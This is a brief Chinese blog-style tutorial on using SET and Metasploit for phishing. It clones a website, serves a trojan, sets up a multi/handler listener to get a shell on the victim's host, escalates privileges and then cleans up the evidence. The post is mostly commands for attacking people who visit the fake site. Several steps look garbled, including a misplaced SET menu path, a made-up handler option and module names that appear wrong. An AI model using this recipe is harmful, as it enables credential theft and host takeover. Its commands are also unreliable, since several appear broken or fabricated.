Kali Linux—借助 SET+MSF 进行网络钓鱼、生成木马、获主机shell、权限提升、远程监控、钓鱼邮件等完整渗透测试
以下是使用SET工具和Metasploit框架进行网络钓鱼、生成木马、获取目标主机shell及权限提升的简化流程:
- 使用SET工具生成钓鱼网页和木马文件:
setoolkit- 选择1 - Social-Engineering Attacks
- 选择2 - Credential Access
- 选择3 - Site Cloner
- 输入要克隆的网站URL
- 选择端口监听模式,并设置监听端口
- 启动Metasploit:
msfconsole- 配置监听模块:
use exploit/multi/handler
set LHOST 0.0.0.0
set LPORT 你设置的端口
set CaptureConfig /path/to/your/set/cloned/site/file.txt- 运行监听模块:
exploit- 用户访问你的钓鱼网站并下载木马,Metasploit等待会话建立:
- 一旦会话建立,你可以使用多个Metasploit模块来获取目标主机的shell:
sessions -i session_id
run post/multi/recon/local_exploit- 使用权限提升模块提升权限:
run post/windows/elevate/elevated_priv- 完成后,清理环境,删除服务器上的钓鱼网页和木马文件。
注意:以上步骤为示例,实际操作时需要根据SET和Metasploit的最新版本以及实际环境进行调整。
评论已关闭